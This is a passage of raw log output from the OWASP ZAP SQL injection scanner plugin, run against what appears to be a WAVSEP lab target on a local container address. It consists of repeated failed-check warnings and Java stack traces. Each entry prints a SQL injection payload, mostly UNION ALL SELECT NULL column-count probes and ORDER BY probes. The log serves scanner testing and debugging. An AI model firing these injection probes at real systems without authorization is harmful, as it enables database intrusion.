org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679472 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679473 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679473 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 9790#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 9790# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679474 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679474 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679475 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679475 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679476 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679477 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679478 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679478 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 7314-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 7314-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679479 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 